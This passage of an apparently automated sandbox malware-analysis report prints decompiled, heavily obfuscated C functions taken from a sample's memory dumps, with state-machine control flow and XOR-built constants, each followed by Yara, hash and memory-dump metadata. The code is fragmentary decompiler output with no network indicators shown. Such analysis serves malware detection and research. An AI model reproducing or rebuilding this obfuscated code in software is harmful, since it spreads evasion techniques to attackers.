                                          							if(_t196 == 0) {
                                          								goto L23;
                                          							}
                                          							_t238 = 0x35a1dc77;
                                          							continue;
                                          						}
                                          						if(_t238 != 0x1b0233d2) {
                                          							goto L20;
                                          						} else {
                                          							_t199 =  *0x6dca2c; // 0x248300
                                          							E006D6128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
                                          							_t202 =  *0x6dca2c; // 0x248300
                                          							_t211 = _v16;
                                          							_t243 =  &(_t243[5]);
                                          							_t205 = 1;
                                          							_t238 = 0x24090f6a;
                                          							 *(_t202 + 0x450) = _v16;
                                          							continue;
                                          						}
                                          					}
                                          					if(_t238 == 0x2394b362) {
                                          						_t242 = E006CF4D0(_t211);
                                          						_t238 = 0x155b4458;
                                          						goto L20;
                                          					}
                                          					if(_t238 == 0x24090f6a) {
                                          						E006CF536(_v100, _v44, _v72, _v32);
                                          						_pop(_t211);
                                          						_t238 = 0x8b9146f;
                                          						goto L1;
                                          					}
                                          					if(_t238 != 0x35a1dc77) {
                                          						goto L20;
                                          					}
                                          					_t238 = 0x8b9146f;
                                          					if(_v36 > 2) {
                                          						_t211 = _v48;
                                          						_t204 = E006CEA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
                                          						_t243 =  &(_t243[4]);
                                          						_v32 = _t204;
                                          						if(_t204 != 0) {
                                          							_t238 = 0x93670d9;
                                          						}
                                          					}
                                          					goto L1;
                                          					L20:
                                          				} while (_t238 != 0x36620d3);
                                          				goto L23;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 'V$\$bo
                                          • API String ID: 0-4178943049
                                          • Opcode ID: 8e38a099659fc669f1a53217cea53fcd1dece341b3ee1ddc17a653a95af50d55
                                          • Instruction ID: ed8381eac5cf1ad7f59b4663ca59454785909b0ab1019f4bd1c1e68c0172e219
                                          • Opcode Fuzzy Hash: 8e38a099659fc669f1a53217cea53fcd1dece341b3ee1ddc17a653a95af50d55
                                          • Instruction Fuzzy Hash: 08A1527190C3429FD358CF29C88940BFBF2BBC4758F10892EF59596260E7B58A498F87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E006C96CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                          				char _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				unsigned int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				signed int _v120;
                                          				unsigned int _v124;
                                          				signed int _v128;
                                          				signed int _v132;
                                          				signed int _v136;
                                          				signed int _v140;
                                          				void* _t162;
                                          				signed int _t179;
                                          				void* _t192;
                                          				signed int _t193;
                                          				signed int _t194;
                                          				signed int _t195;
                                          				signed int _t196;
                                          				signed int _t197;
                                          				void* _t200;
                                          				intOrPtr* _t222;
                                          				signed int* _t223;
                                          				signed int* _t226;
                                          
                                          				_push(_a8);
                                          				_t222 = _a4;
                                          				_t223 = __ecx;
                                          				_push(_t222);
                                          				_push(__ecx);
                                          				E006C602B(_t162);
                                          				_v80 = 0xadf4;
                                          				_t226 =  &(( &_v140)[4]);
                                          				_t200 = 0xade8ac2;
                                          				_t193 = 0x38;
                                          				_v80 = _v80 / _t193;
                                          				_v80 = _v80 ^ 0x00005e4d;
                                          				_v88 = 0xd682;
                                          				_v88 = _v88 ^ 0xf51d39be;
                                          				_v88 = _v88 ^ 0xf51dab09;
                                          				_v96 = 0x72b2;
                                          				_v96 = _v96 ^ 0xfa4c809d;
                                          				_v96 = _v96 ^ 0xfa4c99cb;
                                          				_v116 = 0x90ca;
                                          				_v116 = _v116 | 0x91d06c09;
                                          				_v116 = _v116 ^ 0x5d2d7dc0;
                                          				_v116 = _v116 ^ 0xccfdf140;
                                          				_v124 = 0x94f4;
                                          				_v124 = _v124 >> 9;
                                          				_t194 = 0x7e;
                                          				_v124 = _v124 / _t194;
                                          				_v124 = _v124 >> 1;
                                          				_v124 = _v124 ^ 0x00005a93;
                                          				_v92 = 0xb2da;
                                          				_v92 = _v92 >> 0xf;
                                          				_v92 = _v92 ^ 0x00004526;
                                          				_v132 = 0xfe39;
                                          				_v132 = _v132 ^ 0x94a2bb32;
                                          				_v132 = _v132 + 0xffff197d;
                                          				_v132 = _v132 + 0xa385;
                                          				_v132 = _v132 ^ 0x94a23d21;
                                          				_v104 = 0xe4d2;
                                          				_v104 = _v104 ^ 0x49cfaa80;
                                          				_v104 = _v104 | 0x48b9e868;
                                          				_v104 = _v104 ^ 0x49ffe136;
                                          				_v112 = 0xb598;
                                          				_v112 = _v112 ^ 0x0d96fbe5;
                                          				_v112 = _v112 + 0x88b9;
                                          				_v112 = _v112 ^ 0x0d96d484;
                                          				_v136 = 0x3e03;
                                          				_v136 = _v136 ^ 0x29ac334c;
                                          				_v136 = _v136 >> 9;
                                          				_v136 = _v136 << 8;
                                          				_v136 = _v136 ^ 0x14d602a1;
                                          				_v120 = 0xd3c3;
                                          				_t195 = 0x26;
                                          				_v120 = _v120 / _t195;
                                          				_t196 = 0x3e;
                                          				_v120 = _v120 * 0x17;
                                          				_v120 = _v120 ^ 0x0000f1c0;
                                          				_v140 = 0x72b1;
                                          				_v140 = _v140 + 0xffffab40;
                                          				_v140 = _v140 << 0xe;
                                          				_v140 = _v140 / _t196;
                                          				_v140 = _v140 ^ 0x001e8f72;
                                          				_v128 = 0x9994;
                                          				_v128 = _v128 + 0xffff8c6c;
                                          				_v128 = _v128 + 0xa4f6;
                                          				_t197 = 0x3d;
                                          				_v128 = _v128 / _t197;
                                          				_v128 = _v128 ^ 0x00001242;
                                          				_v100 = 0x8258;
                                          				_v100 = _v100 + 0xffff85b7;
                                          				_v100 = _v100 * 0x51;
                                          				_v100 = _v100 ^ 0x000280a1;
                                          				_v84 = 0x5c44;
                                          				_v84 = _v84 ^ 0x1285eccb;
                                          				_v84 = _v84 ^ 0x12858e57;
                                          				_v108 = 0x7f88;
                                          				_v108 = _v108 | 0x4d438ffe;
                                          				_v108 = _v108 + 0xffff02b4;
                                          				_v108 = _v108 ^ 0x4d436acf;
                                          				do {
                                          					while(_t200 != 0xade8ac2) {
                                          						if(_t200 == 0xeed9730) {
                                          							_push(_t200);
                                          							_push(_t200);
                                          							_t179 = E006C8736(_t223[1]);
                                          							 *_t223 = _t179;
                                          							__eflags = _t179;
                                          							if(__eflags != 0) {
                                          								_t200 = 0x173d5c4e;
                                          								continue;
                                          							}
                                          						} else {
                                          							if(_t200 == 0xffe2862) {
                                          								E006D360F( &_v76, _v120, _v140,  *_t222, _v128);
                                          								_t226 =  &(_t226[3]);
                                          								_t200 = 0x220c9c88;
                                          								continue;
                                          							} else {
                                          								if(_t200 == 0x173d5c4e) {
                                          									E006D50F2( &_v76, _v104, _v112, _v136, _t223);
                                          									_t226 =  &(_t226[3]);
                                          									_t200 = 0xffe2862;
                                          									continue;
                                          								} else {
                                          									if(_t200 == 0x220c9c88) {
                                          										E006C7998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
                                          									} else {
                                          										if(_t200 != 0x2d9f638c) {
                                          											goto L13;
                                          										} else {
                                          											_t207 = _t222;
                                          											_t223[1] = E006D7A0F(_t222);
                                          											_t192 = E006C78A5(_t222, _t207, 0x1000, _t207, 0x400);
                                          											_t226 =  &(_t226[4]);
                                          											_t200 = 0xeed9730;
                                          											_t223[1] = _t223[1] + _t192;
                                          											continue;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L16:
                                          						__eflags =  *_t223;
                                          						_t161 =  *_t223 != 0;
                                          						__eflags = _t161;
                                          						return 0 | _t161;
                                          					}
                                          					 *_t223 = 0;
                                          					_t200 = 0x2d9f638c;
                                          					_t223[1] = 0;
                                          					L13:
                                          					__eflags = _t200 - 0x18ac994b;
                                          				} while (__eflags != 0);
                                          				goto L16;
                                          			}

































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &E$D\$M^
                                          • API String ID: 0-182273106
                                          • Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                          • Instruction ID: 9019d455b313f304850262b59fa1b0c961bbb09e2ce11dbdd7d47a371f910169
                                          • Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
                                          • Instruction Fuzzy Hash: 9B8163715083819FD358CF25C88992BBBE2FBD4358F50891DF196862A0E3B6CA49CF46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006C153C() {
                                          				char _v520;
                                          				signed int _v524;
                                          				signed int _v528;
                                          				signed int _v532;
                                          				signed int _v536;
                                          				signed int _v540;
                                          				signed int _v544;
                                          				signed int _v548;
                                          				signed int _v552;
                                          				signed int _v556;
                                          				signed int _v560;
                                          				signed int _t116;
                                          				void* _t117;
                                          				void* _t119;
                                          				signed int _t122;
                                          				signed int _t134;
                                          				void* _t136;
                                          				signed int _t137;
                                          				signed int* _t138;
                                          
                                          				_t138 =  &_v560;
                                          				_v528 = 0xa2e9;
                                          				_v528 = _v528 + 0xfffffe64;
                                          				_t119 = 0x3a74a7f9;
                                          				_v528 = _v528 ^ 0x0000e8bc;
                                          				_v532 = 0xc148;
                                          				_v532 = _v532 + 0x228e;
                                          				_v532 = _v532 ^ 0x0000dc63;
                                          				_v548 = 0x43c;
                                          				_v548 = _v548 + 0xffff6922;
                                          				_v548 = _v548 | 0xfd2a2fe1;
                                          				_v548 = _v548 ^ 0xb6db9be5;
                                          				_v548 = _v548 ^ 0x4924f3d5;
                                          				_v544 = 0x1b71;
                                          				_v544 = _v544 ^ 0xba1667e6;
                                          				_v544 = _v544 >> 2;
                                          				_v544 = _v544 << 7;
                                          				_v544 = _v544 ^ 0x42cfc722;
                                          				_v540 = 0x29dd;
                                          				_v540 = _v540 + 0xa2;
                                          				_v540 = _v540 ^ 0xc29808bd;
                                          				_v540 = _v540 + 0xffff2b53;
                                          				_v540 = _v540 ^ 0xc2975a13;
                                          				_v556 = 0x7857;
                                          				_v556 = _v556 ^ 0xa059c8e7;
                                          				_v556 = _v556 << 9;
                                          				_v556 = _v556 << 4;
                                          				_v556 = _v556 ^ 0x361613d4;
                                          				_v560 = 0x6ef2;
                                          				_v560 = _v560 ^ 0x7dc12174;
                                          				_v560 = _v560 * 0x52;
                                          				_t136 = 0;
                                          				_v560 = _v560 ^ 0x47eb388f;
                                          				_v536 = 0x33fe;
                                          				_v536 = _v536 + 0x28fb;
                                          				_v536 = _v536 ^ 0x000029c0;
                                          				_v552 = 0x40f6;
                                          				_v552 = _v552 | 0x9b4debbc;
                                          				_v552 = _v552 + 0x1ce1;
                                          				_t134 = 0x7e;
                                          				_t137 = _v536;
                                          				_t135 = _v536;
                                          				_v552 = _v552 / _t134;
                                          				_v552 = _v552 ^ 0x013b83e5;
                                          				_v524 = 0xe5bd;
                                          				_v524 = _v524 ^ 0x97a1ef4c;
                                          				_v524 = _v524 ^ 0x97a11b87;
                                          				do {
                                          					while(_t119 != 0x6cc9294) {
                                          						if(_t119 == 0xcd96d8e) {
                                          							_v560 = 0x65f6;
                                          							_t122 = 0x33;
                                          							_v560 = _v560 / _t122;
                                          							_v560 = _v560 + 0xffffea35;
                                          							_v560 = _v560 ^ 0xd5d8ecd6;
                                          							_t136 =  ==  ? 1 : _t136;
                                          						} else {
                                          							if(_t119 == 0x11374e9c) {
                                          								E006CE29C(_v552, _v524, _t137);
                                          								_t119 = 0xcd96d8e;
                                          								continue;
                                          							} else {
                                          								if(_t119 == 0x31a842b3) {
                                          									_t116 = E006C8697();
                                          									_t135 = _t116;
                                          									if(_t116 != 0) {
                                          										_t119 = 0x34255e69;
                                          										continue;
                                          									}
                                          								} else {
                                          									if(_t119 == 0x34255e69) {
                                          										_t117 = E006C60B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
                                          										_t138 =  &(_t138[5]);
                                          										if(_t117 != 0) {
                                          											_t119 = 0x6cc9294;
                                          											continue;
                                          										}
                                          									} else {
                                          										if(_t119 != 0x3a74a7f9) {
                                          											goto L14;
                                          										} else {
                                          											_t119 = 0x31a842b3;
                                          											continue;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						L17:
                                          						return _t136;
                                          					}
                                          					_t137 = E006C28CE( &_v520, _v560, _v536);
                                          					_t119 = 0x11374e9c;
                                          					L14:
                                          				} while (_t119 != 0x55f7722);
                                          				goto L17;
                                          			}























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: Wx$i^%4$i^%4
                                          • API String ID: 0-1584002782
                                          • Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                          • Instruction ID: 5807affd73e9be1bc7ecadcc32d319793f84867794d26663d53d579faf287f3b
                                          • Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
                                          • Instruction Fuzzy Hash: 405167311083428BD398CF25C19992BBBE2FBC5718F140A1DF096962A1D7B4CA49CF97
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E006D7D03() {
                                          				signed int _v4;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				intOrPtr _t105;
                                          				intOrPtr _t112;
                                          				signed int _t114;
                                          				signed int _t115;
                                          				signed int _t116;
                                          				intOrPtr _t117;
                                          				void* _t119;
                                          				void* _t129;
                                          				signed int* _t131;
                                          
                                          				_t131 =  &_v44;
                                          				_v8 = 0x68fc;
                                          				_v8 = _v8 + 0xbb36;
                                          				_v8 = _v8 ^ 0x000162e9;
                                          				_v44 = 0xabcf;
                                          				_t114 = 0x5a;
                                          				_v44 = _v44 / _t114;
                                          				_v44 = _v44 << 5;
                                          				_t129 = 0x1aabdcf3;
                                          				_v44 = _v44 ^ 0x41a75d37;
                                          				_v44 = _v44 ^ 0x41a744f3;
                                          				_v12 = 0xa837;
                                          				_v12 = _v12 + 0xbdd3;
                                          				_v12 = _v12 ^ 0x0001592e;
                                          				_v36 = 0x1a64;
                                          				_v36 = _v36 + 0x1ecf;
                                          				_v36 = _v36 | 0x383b765c;
                                          				_v36 = _v36 ^ 0x383b27b5;
                                          				_v40 = 0x1cb7;
                                          				_v40 = _v40 | 0xfad83379;
                                          				_t115 = 0x73;
                                          				_v40 = _v40 / _t115;
                                          				_v40 = _v40 ^ 0x022e74ac;
                                          				_v16 = 0x5673;
                                          				_v16 = _v16 << 4;
                                          				_v16 = _v16 ^ 0x00050551;
                                          				_v20 = 0x8ddb;
                                          				_v20 = _v20 + 0xffffc9bf;
                                          				_t116 = 0x22;
                                          				_v20 = _v20 * 0x54;
                                          				_v20 = _v20 ^ 0x001c9060;
                                          				_v24 = 0x24b0;
                                          				_v24 = _v24 ^ 0x7eaabc9b;
                                          				_v24 = _v24 ^ 0x558f972f;
                                          				_v24 = _v24 ^ 0x2b251b7e;
                                          				_v28 = 0xbf97;
                                          				_v28 = _v28 + 0xffff41a2;
                                          				_v28 = _v28 * 0x14;
                                          				_v28 = _v28 ^ 0x00001fe8;
                                          				_v32 = 0x3a57;
                                          				_v32 = _v32 << 3;
                                          				_v32 = _v32 ^ 0x30418ed0;
                                          				_v32 = _v32 ^ 0x30407688;
                                          				_v4 = 0xf5c8;
                                          				_v4 = _v4 / _t116;
                                          				_v4 = _v4 ^ 0x00000add;
                                          				_t117 =  *0x6dca30; // 0x0
                                          				do {
                                          					while(_t129 != 0x15241428) {
                                          						if(_t129 == 0x1aabdcf3) {
                                          							_push(_t117);
                                          							_push(_t117);
                                          							_t119 = 0x2c;
                                          							_t117 = E006C8736(_t119);
                                          							 *0x6dca30 = _t117;
                                          							if(_t117 != 0) {
                                          								_t129 = 0x337355f8;
                                          								continue;
                                          							}
                                          						} else {
                                          							if(_t129 != 0x337355f8) {
                                          								goto L8;
                                          							} else {
                                          								_push(_t117);
                                          								_t112 = E006C59D5(_t117, _v36, _t117, _v40, _v16);
                                          								_t117 =  *0x6dca30; // 0x0
                                          								_t131 =  &(_t131[5]);
                                          								_t129 = 0x15241428;
                                          								 *((intOrPtr*)(_t117 + 8)) = _t112;
                                          								continue;
                                          							}
                                          						}
                                          						goto L9;
                                          					}
                                          					_push(_t117);
                                          					_t105 = E006C1132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E006CE377);
                                          					_t117 =  *0x6dca30; // 0x0
                                          					_t131 =  &(_t131[9]);
                                          					_t129 = 0x3afebe4c;
                                          					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
                                          					L8:
                                          				} while (_t129 != 0x3afebe4c);
                                          				L9:
                                          				return 0 | _t117 != 0x00000000;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: W:$\v;8$sV
                                          • API String ID: 0-492820393
                                          • Opcode ID: 780ea2acc8ee9ae23c9ca9442f43ada66974badfc4b3be31eecb7a0659942f11
                                          • Instruction ID: 5b7c5cd487316072872a92235e17a0e45f3ac5573f545bf76039721edb5dacc4
                                          • Opcode Fuzzy Hash: 780ea2acc8ee9ae23c9ca9442f43ada66974badfc4b3be31eecb7a0659942f11
                                          • Instruction Fuzzy Hash: 46519C715093419FD358CF25C88A81FBBE2FB88368F540A1DF486562A0D3B5CA49CF87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E006D61B8(void* __ecx) {
                                          				signed int _v4;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				void* _t64;
                                          				void* _t68;
                                          				void* _t69;
                                          				signed int _t71;
                                          				void* _t75;
                                          				void* _t76;
                                          				signed int* _t78;
                                          
                                          				_t78 =  &_v24;
                                          				_v12 = 0x5dfc;
                                          				_v12 = _v12 * 0x23;
                                          				_t69 = __ecx;
                                          				_v12 = _v12 << 7;
                                          				_t75 = 0;
                                          				_v12 = _v12 ^ 0x066cb215;
                                          				_t76 = 0x1b4ca438;
                                          				_v24 = 0xd6f7;
                                          				_v24 = _v24 + 0xffffb773;
                                          				_v24 = _v24 + 0xd9f1;
                                          				_v24 = _v24 + 0xe528;
                                          				_v24 = _v24 ^ 0x000200e6;
                                          				_v16 = 0x64b4;
                                          				_v16 = _v16 + 0xda3f;
                                          				_v16 = _v16 >> 1;
                                          				_v16 = _v16 >> 0xd;
                                          				_v16 = _v16 ^ 0x0000725d;
                                          				_v4 = 0xc8c2;
                                          				_v4 = _v4 | 0x9945d150;
                                          				_v4 = _v4 + 0x9caf;
                                          				_v4 = _v4 ^ 0x99461e9f;
                                          				_v20 = 0xe019;
                                          				_t71 = 0x46;
                                          				_v20 = _v20 / _t71;
                                          				_v20 = _v20 >> 0xd;
                                          				_v20 = _v20 >> 4;
                                          				_v20 = _v20 ^ 0x00001f6d;
                                          				_v8 = 0xf95b;
                                          				_v8 = _v8 | 0x30645c78;
                                          				_v8 = _v8 + 0xffff8663;
                                          				_v8 = _v8 ^ 0x3064d0a8;
                                          				do {
                                          					while(_t76 != 0x108726d) {
                                          						if(_t76 == 0x1b4ca438) {
                                          							_t76 = 0x2a486598;
                                          							continue;
                                          						} else {
                                          							if(_t76 == 0x2a486598) {
                                          								_push(_t71);
                                          								_t68 = E006D7F1B();
                                          								_t78 =  &(_t78[1]);
                                          								_t76 = 0x108726d;
                                          								_t75 = _t75 + _t68;
                                          								continue;
                                          							}
                                          						}
                                          						goto L7;
                                          					}
                                          					_t71 = _v16;
                                          					_t64 = E006CD64E(_t71, _v4, _v20, _t69 + 4, _v8);
                                          					_t78 =  &(_t78[3]);
                                          					_t76 = 0xee7d46d;
                                          					_t75 = _t75 + _t64;
                                          					L7:
                                          				} while (_t76 != 0xee7d46d);
                                          				return _t75;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ($]r$x\d0
                                          • API String ID: 0-3053701899
                                          • Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                          • Instruction ID: 1e2ed4ad5b0de2f14db15917864cd58b712c65609dfa05d235139287bd595dac
                                          • Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                          • Instruction Fuzzy Hash: EA3164B29083428FD354DF15D88941BBBE1BBE4718F004E5EF499A6261D379CE0C8B93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E006D0B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				void* _t76;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t76);
                                          				_v16 = 0x6860;
                                          				_v16 = _v16 * 0x5b;
                                          				_v16 = _v16 ^ 0xdc6b4abd;
                                          				_v16 = _v16 ^ 0xdc4e778c;
                                          				_v32 = 0xa230;
                                          				_v32 = _v32 << 0xe;
                                          				_v32 = _v32 ^ 0x288c6565;
                                          				_v8 = 0xfe44;
                                          				_v8 = _v8 | 0x4c3583fb;
                                          				_v8 = _v8 + 0xfffff685;
                                          				_v8 = _v8 ^ 0x61a5c761;
                                          				_v8 = _v8 ^ 0x2d906c10;
                                          				_v40 = 0xe5db;
                                          				_v40 = _v40 | 0x9b65f6ba;
                                          				_v40 = _v40 ^ 0x9b65d356;
                                          				_v20 = 0x9adf;
                                          				_v20 = _v20 + 0x49d9;
                                          				_v20 = _v20 + 0xffff68ea;
                                          				_v20 = _v20 ^ 0x00005968;
                                          				_v36 = 0x94a7;
                                          				_v36 = _v36 ^ 0xf3da6fb3;
                                          				_v36 = _v36 ^ 0xf3dae7d2;
                                          				_v28 = 0xd25a;
                                          				_v28 = _v28 + 0x1e41;
                                          				_v28 = _v28 | 0x2f85fa9d;
                                          				_v28 = _v28 ^ 0x2f85d3ee;
                                          				_v12 = 0x5326;
                                          				_v12 = _v12 ^ 0x0ede0c0e;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 << 4;
                                          				_v12 = _v12 ^ 0x01db8a0a;
                                          				_v24 = 0x6b2;
                                          				_v24 = _v24 << 4;
                                          				_v24 = _v24 | 0x9aa17d8a;
                                          				_t63 =  &_v24;
                                          				_v24 = _v24 ^ 0x9aa13f42;
                                          				_push(_v32);
                                          				_t91 = E006D889D(0x6dc0b0, _v16,  *_t63);
                                          				E006CC680(__ecx, _v40, _v20, 0x6dc0b0, _v36, _a12, _t79, _a4);
                                          				return E006D2025(_v28, _t91, _v12, _v24);
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &S$`h$hY
                                          • API String ID: 0-860638928
                                          • Opcode ID: 10bd70623fdd4759c151cc12a2df8a474579bf387df243e46218902f470e8f6f
                                          • Instruction ID: 8b27b23f81abca9e4e219f2acda10cb76ff91ed3c970acbc75b201b579ac6a42
                                          • Opcode Fuzzy Hash: 10bd70623fdd4759c151cc12a2df8a474579bf387df243e46218902f470e8f6f
                                          • Instruction Fuzzy Hash: EC3121B1C0020AEBDF49DFA1C94A8EEBFB2FF44314F208158E41276260D3B54A55DF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E10007F07(struct _EXCEPTION_POINTERS* _a4) {
                                          
                                          				SetUnhandledExceptionFilter(0);
                                          				return UnhandledExceptionFilter(_a4);
                                          			}

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                          • Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
                                          • Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                          • Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E006D5A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				char _v556;
                                          				signed int _v560;
                                          				signed int _v564;
                                          				signed int _v568;
                                          				signed int _v572;
                                          				signed int _v576;
                                          				signed int _v580;
                                          				signed int _v584;
                                          				signed int _v588;
                                          				signed int _v592;
                                          				signed int _v596;
                                          				signed int _v600;
                                          				void* __ecx;
                                          				void* _t115;
                                          				signed int _t129;
                                          				void* _t136;
                                          				void* _t156;
                                          				signed int _t157;
                                          				signed int _t158;
                                          				signed int _t159;
                                          				signed int* _t163;
                                          
                                          				_push(_a16);
                                          				_t156 = __edx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				E006C602B(_t115);
                                          				_v564 = 0x4767;
                                          				_t163 =  &(( &_v600)[6]);
                                          				_v564 = _v564 << 9;
                                          				_v564 = _v564 ^ 0x008e895f;
                                          				_t136 = 0x30c826c8;
                                          				_v588 = 0x30cc;
                                          				_v588 = _v588 + 0x4702;
                                          				_t157 = 0x63;
                                          				_v588 = _v588 / _t157;
                                          				_v588 = _v588 + 0xb80e;
                                          				_v588 = _v588 ^ 0x0000cf36;
                                          				_v596 = 0xadf;
                                          				_t158 = 0x66;
                                          				_v596 = _v596 * 0x61;
                                          				_v596 = _v596 / _t158;
                                          				_t159 = 0x4c;
                                          				_v596 = _v596 / _t159;
                                          				_v596 = _v596 ^ 0x0000541c;
                                          				_v592 = 0x64b0;
                                          				_v592 = _v592 * 0x15;
                                          				_v592 = _v592 + 0xa35f;
                                          				_v592 = _v592 >> 0xe;
                                          				_v592 = _v592 ^ 0x0000251e;
                                          				_v600 = 0x3c82;
                                          				_v600 = _v600 | 0xdba50be5;
                                          				_v600 = _v600 ^ 0x0661176e;
                                          				_v600 = _v600 + 0x2491;
                                          				_v600 = _v600 ^ 0xddc40dba;
                                          				_v572 = 0x6631;
                                          				_v572 = _v572 + 0xffff287e;
                                          				_v572 = _v572 + 0x2e34;
                                          				_v572 = _v572 ^ 0xffff8a80;
                                          				_v584 = 0x3cf9;
                                          				_v584 = _v584 ^ 0x209cd78c;
                                          				_v584 = _v584 ^ 0x88ea975c;
                                          				_v584 = _v584 | 0x088f8ebb;
                                          				_v584 = _v584 ^ 0xa8ffe4fe;
                                          				_v560 = 0x5a99;
                                          				_v560 = _v560 << 2;
                                          				_v560 = _v560 ^ 0x0001627e;
                                          				_v576 = 0xc549;
                                          				_v576 = _v576 * 0x36;
                                          				_v576 = _v576 + 0xffff72cb;
